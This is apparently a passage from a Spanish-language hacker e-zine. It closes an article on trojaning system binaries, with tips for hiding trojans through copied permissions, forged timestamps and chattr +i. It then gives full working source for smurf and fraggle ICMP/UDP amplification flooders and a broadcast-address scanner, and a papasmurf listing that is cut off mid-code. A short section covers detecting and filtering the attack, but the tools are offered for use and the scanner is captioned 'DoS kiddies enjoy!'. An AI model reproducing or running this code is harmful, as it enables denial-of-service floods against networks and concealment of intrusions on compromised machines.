- 3 8000 <- Oculta todas las conexiones al puerto local
- 8000
- 4 6667 <- Oculta todas las conexiones al puerto remoto
- 6667
- 5 .term/socket <- Oculta este socket
-
- El fichero modificado hay que copiarlo sobreescribiendo el
- /bin/netstat, y hay que poner siempre ips, si pones hosts no funcionara.
-
- *- Consejos finales
- -------------------
-
- Pues ahi van unos consejos que a mi al menos me son de utilidad:
-
- 1.- Cuando metas un troyano fijate bien en los permisos para que tenga
- los del programa origal, y que el dueño y el grupo sea el mismo.
-
- 2.- Para que no llame mucho la atencion la fecha haz un touch -r
- fichero_de_referencia troyano, asi el troyano quedara con la fecha del
- fichero de referencia.
-
- 3.- Con chattr +i troyano el fichero no se podra borrar, ni siquiera
- el root podra a no ser que ponga chattr -i troyano.
-
- 4.- Si la makina no tiene activado el ftp y no sabes como subir los
- troyanos, haz un ftp a tu ordenador desde alli y bajatelos.
-
- *- Despedida
- ------------
-
- Bueno, esto ya se ha acabado. Recordad bajaros los troyanos completos
- de http://welcome.to/neptuno, ya que aqui no los he podido incluir por
- razones de espacio.
-
- Un saludo a mi novia, y a toda la peña del canal #hacker_novatos,
- especialmente a ulan, sp4rk, kr0n0, MaNiaK, Case, Freedom (fundandor de la
- pagina del canal) y a alguno mas que se me olvida. Ah!, y no olvideis
- pasaros por el canal de vez en cuando ;) Byes.
-
- PoSiDoN
- posidon@poboxes.com
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- Todo (o casi todo) sobre el SMURFING v1.0
- -----------------------------------------
-
- Mac Crack
- - J.J.F / Hackers Team -
-
- 1.- Que es el SMURFING?
- 2.- Como actua?
- 3.- Forma de arreglarlo/detectarlo
- 3.1.- Usando smurflog.tgz
- 3.2.- Filtrando informacion
- 4.- Herramientas
- smurf.c
- fraggle.c
- broadscan.c
- papasmurf.c
- papasmurf-linux.c
- 5.- Creditos
-
- 1.- Que es el SMURFING?
- -----------------------
-
- El smurfing es un tipo de ataque a traves de ICMP que basicamente lo
- que hace es flodear una red de ordenadores, simulando una IP falsa. Es un
- ataque bastante simple en si, pero muy desagradable tambien, te colapsa la
- red.
-
- 2.- Como actua?
- ---------------
-
- Lo que hace basicamente es mandar un monton de paquetes por ICMP como
- dije antes. La manera de hacerlo es spoofeando las IP's de la red a atacar.
- El smurf lanza un ataque de, pongamos por ejemplo 25 Kbps de ICMP a una red
- de 100 ordenadores. Bien, digamos que la "ventaja" de este ataque es que te
- pueden mandar una burrada de paquetes a la vez, ya que son muy pequeños.
- El ordenador a los que le mandamos estos paquetes, analiza de donde vienen,
- pero al tener una IP simulada de la red a donde mandamos este ataque, el
- ordenador piensa que se lo esta mandando un ordenador de su misma red, por
- lo cual, le devuelve el ataque, PERO, se lo devuelve a otro ordenador
- distinto de la misma red, es decir, se estan atacando unos a otros dentro de
- su misma red sin saberlo. Este ataque es una manera de DoS (denial of
- service). Al poco rato la red se cae por inundacion (flood) de paquetes de
- informacion. Basicamente este ataque se usa mucho en los servers de IRC.
-
- Vamos a analizar este ataque un poco mas. Otra de las "ventajas" que
- tiene este ataque es que funciona desde cualquier sitio, es decir, no
- importa el tipo de conexion que tengas, te funciona desde un modem a 14.4
- hasta una T3, es la leche. Puedo asegurar que desde una T1 (a la cual
- tenemos acceso) funciona muy bien y la red se va al carajo en muy poco
- tiempo, el experimento fue realizado en la VPN (Virtual Private Network)
- de - J.J.F. / Hackers Team -, no os recomiendo que jugueis con las redes
- de la universidad, os pueden pillar :o).
-
- 3.- Como arreglarlo/detectarlo
- ------------------------------
-
- Este es otro problema que tiene el SMURFING, no se puede arreglar. Al
- ser un ataque relativamente nuevo, todavia no se ha encontrado algo para
- arreglarlo. Si se ha encontrado la manera de detectarlo y encontrar al que
- te esta lanzando el ataque. Es un archivo para UNIX (en LinuX supongo que
- tambien chutara, no lo he probado) que se llama Smurflog.tgz, el cual lo
- podreis encontrar en http://www.rootshell.com. Se puede intentar arreglar de
- dos formas. Una de ellas es usando el smurlog.tgz y otra es cambiando las
- preferencias de la maquina, es decir con un filtro.
-
- Si no me equivoco, ahora mismo MCI esta trabajando en un parche para
- el smurf.c, podeis mirar por:
- http://www.internetnews.com/isp-news/1997/10/0901-mci.html
-
- 3.1.- Usando smurflog.tgz
- -------------------------
-
- Este es un programa para UNIX, que basicamente lo que hace es loguear
- todo el proceso de ataque el cual te da quien te esta atacando y desde
- donde te esta atacando.
-
- 3.2.- Filtrando informacion
- ---------------------------
-
- Se podria decir que esta es una manera un poco rudimentaria de
- protegerse del SMURFING. Lo que se hace es no aceptar paquetes de ICMP. Es
- una manera un poco lenta, pero evitas el riesgo de ataque o al menos reduce
- el daño que le pueda causar al ordenador. La verdad es que tambien al tener
- una red, el router juega un papel importante, como dije antes puedes denegar
- los accesos de ICMP, pero no es una de las mejores soluciones, aunque ayuda
- a que no entren paquetes ICMP. Lo bueno que tiene usar el router y denegar
- paquetes ICMP es que cuando se manda el ataque pasa a traves del router y
- si el router no lo identifica hace que el ataque no funcione. Esto se puede
- hacer simplemente añadiendo una linea al router, pero como dije antes, lo
- que hace es denegar ICMP hasta que termine el ataque.
-
- 4.- Herramientas
- ----------------
-
- Basicamente se necesitan 5 programas para llevar a cabo este ataque y
- de los cuales esta puesto el codigo fuente un poco mas abajo de estas lineas
- :o). Pero antes vamos a ver que necesitamos.
-
- smurf.c: El smurf puro y duro, compilar y ejecutar.
- fraggle.c: Se puede decir que es un smurf, pero ya mas avanzado.
- broadscan.c: Scanner de IP's para saber por donde atacas, muy util.
- papasmurf.c: Es una mezcla entre el smurf.c y el fraggle.c
- papasmurf-linux.c: Claro, no? para que los usuarios de LinuX tambien puedan
- jugar :o), es un programa que solo corre en plataforma
- LinuX, de hecho esta especialmente diseñado para LinuX.
-
- Bien, despues de esta pequeña introduccion de las herramientas, vamos
- a ver los programas en pelota, es decir su codigo fuente, aqui van:
-
- SMURF.C (versiones 4.0 y 5.0)
- -----------------------------
-
- --- smurf.c v4.0 ---
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- /*
- *
- * $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $
- *
- * spoofs icmp packets from a host to various broadcast addresses resulting
- * in multiple replies to that host from a single packet.
- *
- * disclaimer:
- * I cannot and will not be held responsible nor legally bound for the
- * malicious activities of individuals who come into possession of this
- * program and I refuse to provide help or support of any kind and do NOT
- * condone use of this program to deny service to anyone or any machine.
- * This is for educational use only. Please Don't abuse this.
- *
- *
- */
-
- #include <signal.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <netinet/in.h>
- #include <netinet/ip.h>
- #include <netinet/ip_icmp.h>
- #include <netdb.h>
- #include <ctype.h>
- #include <arpa/inet.h>
- #include <unistd.h>
- #include <string.h>
-
- void banner(void);
- void usage(char *);
- void smurf(int, struct sockaddr_in, u_long, int);
- void ctrlc(int);
- unsigned short in_chksum(u_short *, int);
-
- /* stamp */
- char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $";
-
- int main (int argc, char *argv[])
- {
- struct sockaddr_in sin;
- struct hostent *he;
- FILE *bcastfile;
- int i, sock, bcast, delay, num, pktsize, cycle = 0, x;
- char buf[32], **bcastaddr = malloc(8192);
-
- banner();
- signal(SIGINT, ctrlc);
-
- if (argc < 6) usage(argv[0]);
-
- if ((he = gethostbyname(argv[1])) == NULL) {
- perror("resolving source host");
- exit(-1);
- }
- memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length);
- sin.sin_family = AF_INET;
- sin.sin_port = htons(0);
-
- num = atoi(argv[3]);
- delay = atoi(argv[4]);
- pktsize = atoi(argv[5]);
-
- if ((bcastfile = fopen(argv[2], "r")) == NULL) {
- perror("opening bcast file");
- exit(-1);
- }
- x = 0;
- while (!feof(bcastfile)) {
- fgets(buf, 32, bcastfile);
- if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue;
- for (i = 0; i < strlen(buf); i++)
- if (buf[i] == '\n') buf[i] = '\0';
- bcastaddr[x] = malloc(32);
- strcpy(bcastaddr[x], buf);
- x++;
- }
- bcastaddr[x] = 0x0;
- fclose(bcastfile);
-
- if (x == 0) {
- fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
- exit(-1);
- }
- if (pktsize > 1024) {
- fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
- exit(-1);
- }
-
- if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
- perror("getting socket");
- exit(-1);
- }
- setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast));
-
- printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);
-
- for (i = 0; i < num || !num; i++) {
- if (!(i % 25)) { printf("."); fflush(stdout); }
- smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
- cycle++;
- if (bcastaddr[cycle] == 0x0) cycle = 0;
- usleep(delay);
- }
- puts("\n\n");
- return 0;
- }
-
- void banner (void)
- {
- puts("\nsmurf.c v4.0 by TFreak\n");
- }
-
- void usage (char *prog)
- {
- fprintf(stderr, "usage: %s <target> <bcast file> "
- "<num packets> <packet delay> <packet size>\n\n"
- "target = address to hit\n"
- "bcast file = file to read broadcast addresses from\n"
- "num packets = number of packets to send (0 = flood)\n"
- "packet delay = wait between each packet (in ms)\n"
- "packet size = size of packet (< 1024)\n\n", prog);
- exit(-1);
- }
-
- void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize)
- {
- struct iphdr *ip;
- struct icmphdr *icmp;
- char *packet;
-
- packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
- ip = (struct iphdr *)packet;
- icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));
-
- memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
-
- ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
- ip->ihl = 5;
- ip->version = 4;
- ip->ttl = 255;
- ip->tos = 0;
- ip->frag_off = 0;
- ip->protocol = IPPROTO_ICMP;
- ip->saddr = sin.sin_addr.s_addr;
- ip->daddr = dest;
- ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));
- icmp->type = 8;
- icmp->code = 0;
- icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);
-
- sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,
- 0, (struct sockaddr *)&sin, sizeof(struct sockaddr));
-
- free(packet); /* free willy! */
- }
-
- void ctrlc (int ignored)
- {
- puts("\nDone!\n");
- exit(1);
- }
-
- unsigned short in_chksum (u_short *addr, int len)
- {
- register int nleft = len;
- register int sum = 0;
- u_short answer = 0;
-
- while (nleft > 1) {
- sum += *addr++;
- nleft -= 2;
- }
-
- if (nleft == 1) {
- *(u_char *)(&answer) = *(u_char *)addr;
- sum += answer;
- }
-
- sum = (sum >> 16) + (sum + 0xffff);
- sum += (sum >> 16);
- answer = ~sum;
- return(answer);
- }
-
- ------------ FIN -------------------------------------------------------------
-
- --- smurf.c v5.0 ---
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- /*
- * $Id smurf.c,v 5.0 1997/10/13 22:37:21 CDT griffin Exp $
- *
- * spoofs icmp packets from a host to various broadcast addresses resulting in
- * multiple replies to that host from a single packet.
- *
- * disclaimer: I cannot and will not be held responsible nor legally bound for
- * the malicious activities of individuals who come into possession of this
- * program and I refuse to provide help or support of any kind and do NOT
- * condone use of this program to deny service to anyone or any machine. This
- * is for educational use only. Please Don't abuse this.
- *
- *
- */
-
- #include <signal.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <netdb.h>
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <netinet/in.h>
- #include <netinet/in_systm.h>
- #include <netinet/ip.h>
- #include <netinet/ip_icmp.h>
- #include <ctype.h>
- #include <arpa/inet.h>
- #include <unistd.h>
- #include <string.h>
-
- void banner(void);
- void usage(char *);
- void smurf(int, struct sockaddr_in, u_long, int);
- void ctrlc(int);
- unsigned int host2ip(char *hostname);
- unsigned short in_chksum(u_short *, int);
-
- unsigned int
- host2ip(char *hostname)
- {
- static struct in_addr i;
- struct hostent *h;
- i.s_addr = inet_addr(hostname);
- if (i.s_addr == -1) {
- h = gethostbyname(hostname);
- if (h == NULL) {
- fprintf(stderr, "can't find %s\n.", hostname);
- exit(0);
- }
- bcopy(h->h_addr, (char *) &i.s_addr, h->h_length);
- }
- return i.s_addr;
- }
-
- /* stamp */
- char id[] = "$Id smurf.c,v 5.0 1997/10/13 22:37:21 CDT griffin Exp $";
-
- int
- main(int argc, char *argv[])
- {
- struct sockaddr_in sin;
- FILE *bcastfile;
- int i, sock, bcast, delay, num, pktsize, cycle = 0,
- x;
- char buf[32], **bcastaddr = malloc(8192);
-
- banner();
- signal(SIGINT, ctrlc);
-
- if (argc < 6)
- usage(argv[0]);
-
- sin.sin_addr.s_addr = host2ip(argv[1]);
- sin.sin_family = AF_INET;
-
- num = atoi(argv[3]);
- delay = atoi(argv[4]);
- pktsize = atoi(argv[5]);
-
- if ((bcastfile = fopen(argv[2], "r")) == NULL) {
- perror("opening bcast file");
- exit(-1);
- }
- x = 0;
- while (!feof(bcastfile)) {
- fgets(buf, 32, bcastfile);
- if (buf[0] == '#' || buf[0] == '\n' || !isdigit(buf[0]))
- continue;
- for (i = 0; i < strlen(buf); i++)
- if (buf[i] == '\n')
- buf[i] = '\0';
- bcastaddr[x] = malloc(32);
- strcpy(bcastaddr[x], buf);
- x++;
- }
- bcastaddr[x] = 0x0;
- fclose(bcastfile);
-
- if (x == 0) {
- fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
- exit(-1);
- }
- if (pktsize > 1024) {
- fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
- exit(-1);
- }
- if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
- perror("getting socket");
- exit(-1);
- }
- setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *) &bcast, sizeof(bcast));
-
- printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);
-
- for (i = 0; i < num || !num; i++) {
- if (!(i % 25)) {
- printf(".");
- fflush(stdout);
- }
- smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
- cycle++;
- if (bcastaddr[cycle] == 0x0)
- cycle = 0;
- usleep(delay);
- }
- puts("\n\n");
- return 0;
- }
-
- void
- banner(void)
- {
- puts("\nsmurf.c v5.0 by TFreak, ported by Griffin\n");
- }
-
- void
- usage(char *prog)
- {
- fprintf(stderr, "usage: %s <target> <bcast file> "
- "<num packets> <packet delay> <packet size>\n\n"
- "target = address to hit\n"
- "bcast file = file to read broadcast addresses from\n"
- "num packets = number of packets to send (0 = flood)\n"
- "packet delay = wait between each packet (in ms)\n"
- "packet size = size of packet (< 1024)\n\n", prog);
- exit(-1);
- }
-
- void
- smurf(int sock, struct sockaddr_in sin, u_long dest, int psize)
- {
- struct ip *ip;
- struct icmp *icmp;
- char *packet;
- int hincl = 1;
-
- packet = malloc(sizeof(struct ip) + sizeof(struct icmp) + psize);
- ip = (struct ip *) packet;
- icmp = (struct icmp *) (packet + sizeof(struct ip));
-
- memset(packet, 0, sizeof(struct ip) + sizeof(struct icmp) + psize);
- setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &hincl, sizeof(hincl));
- ip->ip_len = sizeof(struct ip) + sizeof(struct icmp) + psize;
- ip->ip_hl = sizeof *ip >> 2;
- ip->ip_v = 4;
- ip->ip_ttl = 255;
- ip->ip_tos = 0;
- ip->ip_off = 0;
- ip->ip_id = htons(getpid());
- ip->ip_p = 1;
- ip->ip_src.s_addr = sin.sin_addr.s_addr;
- ip->ip_dst.s_addr = dest;
- ip->ip_sum = 0;
- icmp->icmp_type = 8;
- icmp->icmp_code = 0;
- icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
-
- sendto(sock, packet, sizeof(struct ip) + sizeof(struct icmp) + psize,
- 0, (struct sockaddr *) & sin, sizeof(struct sockaddr));
-
- free(packet); /* free willy! */
- }
-
- void
- ctrlc(int ignored)
- {
- puts("\nDone!\n");
- exit(1);
- }
-
- unsigned short
- in_chksum(u_short * addr, int len)
- {
- register int nleft = len;
- register int sum = 0;
- u_short answer = 0;
-
- while (nleft > 1) {
- sum += *addr++;
- nleft -= 2;
- }
-
- if (nleft == 1) {
- *(u_char *) (&answer) = *(u_char *) addr;
- sum += answer;
- }
- sum = (sum >> 16) + (sum + 0xffff);
- sum += (sum >> 16);
- answer = ~sum;
- return (answer);
- }
-
- ------------ FIN -------------------------------------------------------------
-
- --- fraggle.c ---
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- /*
- * fraggle.c by TFreak
- *
- * This is basically smurf.c with a udp twist. There are _many_ interesting
- * things you can do with this program, I suggest you experiment with it.
- *
- * Disclaimer:
- * I cannot and will not be held responsible nor legally bound for the
- * malicious activities of individuals who come into possession of this
- * program and I refuse to provide help or support of any kind and do NOT
- * condone or promote use of this program to deny service to anyone or any
- * machine. This is for educational use only. Please don't abuse this.
- *
- * "Love is much more evil than hate will ever be ..."
- */
-
- #include <arpa/inet.h>
- #include <ctype.h>
- #include <netdb.h>
- #include <netinet/in.h>
- #include <netinet/ip.h>
- #include <netinet/ip_udp.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <signal.h>
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <time.h>
- #include <unistd.h>
-
- struct pktinfo
- {
- int ps;
- int src;
- int dst;
- };
-
- void fraggle (int, struct sockaddr_in *, u_long dest, struct pktinfo *);
- void sigint (int);
- unsigned short checksum (u_short *, int);
-
- int main (int argc, char *argv[])
- {
- struct sockaddr_in sin;
- struct hostent *he;
- struct pktinfo p;
- int s, num, delay, n, cycle;
- char **bcast = malloc(1024), buf[32];
- FILE *bfile;
-
- /* banner */
- fprintf(stderr, "\nfraggle.c by TFreak\n\n");
-
- /* capture ctrl-c */
- signal(SIGINT, sigint);
-
- /* check for enough cmdline args */
- if (argc < 5)
- {
- fprintf(stderr, "usage: %s <target> <bcast file> <num packets> "
- "<packet delay> [dstport] [srcport] [psize] \n\n"
- "target\t\t= address to hit\n"
- "bcast file\t= file containing broadcast addrs\n"
- "num packets\t= send n packets (n = 0 is constant)\n"
- "packet delay\t= usleep() between packets (in ms)\n"
- "dstport\t\t= port to hit (default 7)\n"
- "srcport\t\t= source port (0 for random)\n"
- "ps\t\t= packet size\n\n",
- argv[0]);
- exit(-1);
- }
-
- /* get port info */
- if (argc >= 6)
- p.dst = atoi(argv[5]);
- else
- p.dst = 7;
- if (argc >= 7)
- p.src = atoi(argv[6]);
- else
- p.src = 0;
-
- /* packet size redundant if not using echo port */
- if (argc >= 8)
- p.ps = atoi(argv[7]);
- else
- p.ps = 1;
-
- /* other variables */
- num = atoi(argv[3]);
- delay = atoi(argv[4]);
-
- /* resolve host */
- if (isdigit(*argv[1]))
- sin.sin_addr.s_addr = inet_addr(argv[1]);
- else
- {
- if ((he = gethostbyname(argv[1])) == NULL)
- {
- fprintf(stderr, "Can't resolve hostname!\n\n");
- exit(-1);
- }
-
- memcpy( (caddr_t) &sin.sin_addr, he->h_addr, he->h_length);
- }
- sin.sin_family = AF_INET;
- sin.sin_port = htons(0);
-
- /* open bcast file and build array */
- if ((bfile = fopen(argv[2], "r")) == NULL)
- {
- perror("opening broadcast file");
- exit(-1);
- }
- n = 0;
- while (fgets(buf, sizeof buf, bfile) != NULL)
- {
- buf[strlen(buf) - 1] = 0;
- if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0]))
- continue;
- bcast[n] = malloc(strlen(buf) + 1);
- strcpy(bcast[n], buf);
- n++;
- }
- bcast[n] = '\0';
- fclose(bfile);
-
- /* check for addresses */
- if (!n)
- {
- fprintf(stderr, "Error: No valid addresses in file!\n\n");
- exit(-1);
- }
-
- /* create our raw socket */
- if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) <= 0)
- {
- perror("creating raw socket");
- exit(-1);
- }
-
- printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);
-
- for (n = 0, cycle = 0; n < num || !num; n++)
- {
- if (!(n % 25))
- {
- printf(".");
- fflush(stdout);
- }
-
- srand(time(NULL) * rand() * getpid());
-
- fraggle(s, &sin, inet_addr(bcast[cycle]), &p);
- if (bcast[++cycle] == NULL)
- cycle = 0;
- usleep(delay);
- }
-
- sigint(0);
- }
-
- void fraggle (int s, struct sockaddr_in *sin, u_long dest, struct pktinfo *p)
- {
- struct iphdr *ip;
- struct udphdr *udp;
- char *packet;
- int r;
-
- packet = malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
- ip = (struct iphdr *)packet;
- udp = (struct udphdr *) (packet + sizeof(struct iphdr));
-
- memset(packet, 0, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
-
- /* ip header */
- ip->protocol = IPPROTO_UDP;
- ip->saddr = sin->sin_addr.s_addr;
- ip->daddr = dest;
- ip->version = 4;
- ip->ttl = 255;
- ip->tos = 0;
- ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
- ip->ihl = 5;
- ip->frag_off = 0;
- ip->check = checksum((u_short *)ip, sizeof(struct iphdr));
-
- /* udp header */
- udp->len = htons(sizeof(struct udphdr) + p->ps);
- udp->dest = htons(p->dst);
- if (!p->src)
- udp->source = htons(rand());
- else
- udp->source = htons(p->src);
-
- /* send it on its way */
- r = sendto(s, packet, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps,
- 0, (struct sockaddr *) sin, sizeof(struct sockaddr_in));
- if (r == -1)
- {
- perror("\nSending packet");
- exit(-1);
- }
-
- free(packet); /* free willy 2! */
- }
-
- unsigned short checksum (u_short *addr, int len)
- {
- register int nleft = len;
- register u_short *w = addr;
- register int sum = 0;
- u_short answer = 0;
-
- while (nleft > 1)
- {
- sum += *w++;
- nleft--;
- }
-
- if (nleft == 1)
- {
- *(u_char *) (&answer) = *(u_char *) w;
- sum += answer;
- }
-
- sum = (sum >> 17) + (sum & 0xffff);
- sum += (sum >> 17);
- answer = -sum;
- return (answer);
- }
-
- void sigint (int ignoremewhore)
- {
- fprintf(stderr, "\nDone!\n\n");
- exit(0);
- }
-
- ------------ FIN -------------------------------------------------------------
-
- --- broadscan.c v0.31 ---
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- /* Broadscan v 0.31 DUP Broadcast IP scanner
- by Vacuum http://www.technotronic.com 09-03-98
- This is a very lame scanner written to
- stop people from asking how to find
- DUP broadcast ip addresses. Use this in
- conjunction with smurf, fraggle,
- or papasmurf. DoS kiddies enjoy!
-
- */#include <stdlib.h>
- #include <stdio.h>
- #define DEBUG 1FILE *stream;
- void pingz0r(int first, int second, int start, int end)
- {
- int counter,flag;
- FILE *stream;
- char tempstring[2048];
- char parse[2048];
- for (counter=start; counter <end; counter++)
- {
- flag=0;
- sprintf(tempstring,"ping -c 2 -n %d.%d.%d.255 2>/dev/null",first,
- second, counter);
- stream=popen(tempstring,"r");
- while (fgets(parse,sizeof(parse),stream)!=NULL)
- {
- if (DEBUG) printf("Results:%s",parse);
- if (strstr(parse,"DUP"))
- {
- flag=1;
- fclose(stream);
- break;
- }
- }
- if (flag==1) stream=fopen("broadcast.txt", "a");
- fprintf(stream, "%d.%d.%d.255\n",first,second,counter);
- fclose( stream);
- }
- }
- main(int argc, char *argv[])
- {
- int first,second;
- if (argc!=3)
- {
- printf("\nusage : %s <octet> <octet>\n\n",argv[0]);
- exit(0);
- }
- first=atoi(argv[1]);second=atoi(argv[2]);
- if (first==127)
- {
- printf("%d is a localhost. You have no clue or are trying
- to break this program",first);
- exit(0);
- }
- if (first>254 || first <0)
- {
- printf("First octet is: %d. It must be between <1-254>",first);
- exit(0);
- }
- if (second>254 || second<0)
- {
- printf("Second octet is: %d. It must be <1-254>",second);
- exit(0);
- }
- printf("Scanning for DUP broadcast ip addresses\n");
- printf("Results output to broadcast.txt\n");
- if (fork()!=0)
- pingz0r(first,second,0,128);
- else
- pingz0r(first,second,128,255);
- }
-
- ------------ FIN -------------------------------------------------------------
-
- --- papasmurf.c v5.0 ---
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- /*
- * (papa)smurf.c v5.0 by TFreak - http://www.rootshell.com
- *
- *
- * To compile: "gcc -DLINUX -o smurf5 papasmurf.c" if your LINUXish.
- * or just
- * "gcc -o smurf5 papasmurf.c" if your BSDish.
- *
- * Old linux kernels won't have BSD header support, so this may not compile.
- */
-
- /* End of Hideously Long Header */
-
- #include <stdio.h>
- #include <netdb.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <netinet/in_systm.h>
- #include <arpa/inet.h>
- #include <sys/stat.h>
- #include <fcntl.h>
- #include <unistd.h>
- #include <stdlib.h>
- #include <string.h>
- #include <ctype.h>
- #include <time.h>
- #ifdef LINUX
- #define __FAVOR_BSD /* should be __FAVOUR_BSD ;) */
- #ifndef _USE_BSD
- #define _USE_BSD
- #endif
- #endif
- #include <netinet/ip.h>
- #include <netinet/ip_icmp.h>
- #include <netinet/udp.h>
-
- #ifdef LINUX
- #define FIX(n) htons(n)
- #else
- #define FIX(n) (n)
- #endif
-
- struct smurf_t
- {
- struct sockaddr_in sin; /* socket prot structure */
- int s; /* socket */
- int udp, icmp; /* icmp, udp booleans */
- int rnd; /* Random dst port boolean */
- int psize; /* packet size */
- int num; /* number of packets to send */
- int delay; /* delay between (in ms) */
- u_short dstport[25+1]; /* dest port array (udp) */
- u_short srcport; /* source port (udp) */
- char *padding; /* junk data */
- };
-
- /* function prototypes */
- void usage (char *);
- u_long resolve (char *);
- void getports (struct smurf_t *, char *);
- void smurficmp (struct smurf_t *, u_long);
- void smurfudp (struct smurf_t *, u_long, int);
- u_short in_chksum (u_short *, int);
-
- int
- main (int argc, char *argv[])
- {
- struct smurf_t sm;
- struct stat st;
- u_long bcast[1024];
- char buf[32];
- int c, fd, n, cycle, num = 0, on = 1;
- FILE *bcastfile;
-
- /* shameless self promotion banner */
- fprintf(stderr, "\n(papa)smurf.c v5.0 by TFreak\n\n");
-
- if (argc < 3)
- usage(argv[0]);
-
- /* set defaults */
- memset((struct smurf_t *) &sm, 0, sizeof(sm));
- sm.icmp = 1;
- sm.psize = 64;
- sm.num = 0;
- sm.delay = 10000;
- sm.sin.sin_port = htons(0);
- sm.sin.sin_family = AF_INET;
- sm.srcport = 0;
- sm.dstport[0] = 7;
-
- /* resolve 'source' host, quit on error */
- sm.sin.sin_addr.s_addr = resolve(argv[1]);
-
- /* open the broadcast file */
- if ((bcastfile = fopen(argv[2], "r")) == NULL)
- {
- perror("Opening broadcast file");
- exit(-1);
- }
-
- /* parse out options */
- optind = 3;
- while ((c = getopt(argc, argv, "rRn:d:p:P:s:S:f:")) != -1)
- {
- switch (c)
- {
- /* random dest ports */
- case 'r':
- sm.rnd = 1;
- break;
-
- /* random src/dest ports */
- case 'R':
- sm.rnd = 1;
- sm.srcport = 0;
- break;
-
- /* number of packets to send */
- case 'n':
- sm.num = atoi(optarg);
- break;
-
- /* usleep between packets (in ms) */
- case 'd':
- sm.delay = atoi(optarg);
- break;
-
- /* multiple ports */
- case 'p':
- if (strchr(optarg, ','))
- getports(&sm, optarg);
- else
- sm.dstport[0] = (u_short) atoi(optarg);
- break;
-
- /* specify protocol */
- case 'P':
- if (strcmp(optarg, "icmp") == 0)
- {
- /* this is redundant */
- sm.icmp = 1;
- break;
- }
- if (strcmp(optarg, "udp") == 0)
- {
- sm.icmp = 0;
- sm.udp = 1;
- break;
- }
- if (strcmp(optarg, "both") == 0)
- {
- sm.icmp = 1;
- sm.udp = 1;
- break;
- }
-
- puts("Error: Protocol must be icmp, udp or both");
- exit(-1);
-
- /* source port */
- case 's':
- sm.srcport = (u_short) atoi(optarg);
- break;
-
- /* specify packet size */
- case 'S':
- sm.psize = atoi(optarg);
- break;
-
- /* filename to read padding in from */
- case 'f':
- /* open and stat */
- if ((fd = open(optarg, O_RDONLY)) == -1)
- {
- perror("Opening packet data file");
- exit(-1);
- }
- if (fstat(fd, &st) == -1)
- {
- perror("fstat()");
- exit(-1);
- }
-
- /* malloc and read */
- sm.padding = (char *) malloc(st.st_size);
- if (read(fd, sm.padding, st.st_size) < st.st_size)
- {
- perror("read()");
- exit(-1);
- }
-
- sm.psize = st.st_size;
- close(fd);
- break;
-
- default:
- usage(argv[0]);
- }
- } /* end getopt() loop */
-
- /* create packet padding if neccessary */
- if (!sm.padding)
- {
- sm.padding = (char *) malloc(sm.psize);
- memset(sm.padding, 0, sm.psize);
- }
-
- /* create the raw socket */
- if ((sm.s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
- {
- perror("Creating raw socket (are you root?)");
- exit(-1);
- }
-
- /* Include IP headers ourself (thanks anyway though) */
- if (setsockopt(sm.s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
- {
- perror("setsockopt()");
- exit(-1);
- }
-
- /* read in our broadcasts and store them in our array */
- while (fgets(buf, sizeof buf, bcastfile) != NULL)
- {
- char *p;
- int valid;
-
- /* skip over comments/blank lines */
- if (buf[0] == '#' || buf[0] == '\n') continue;
-
- /* get rid of newline */
- buf[strlen(buf) - 1] = '\0';
-
- /* check for valid address */
- for (p = buf, valid = 1; *p != '\0'; p++)
- {
- if ( ! isdigit(*p) && *p != '.' )
- {
- fprintf(stderr, "Skipping invalid ip %s\n", buf);
- valid = 0;
- break;
- }
- }
-
- /* if valid address, copy to our array */
- if (valid)
- {
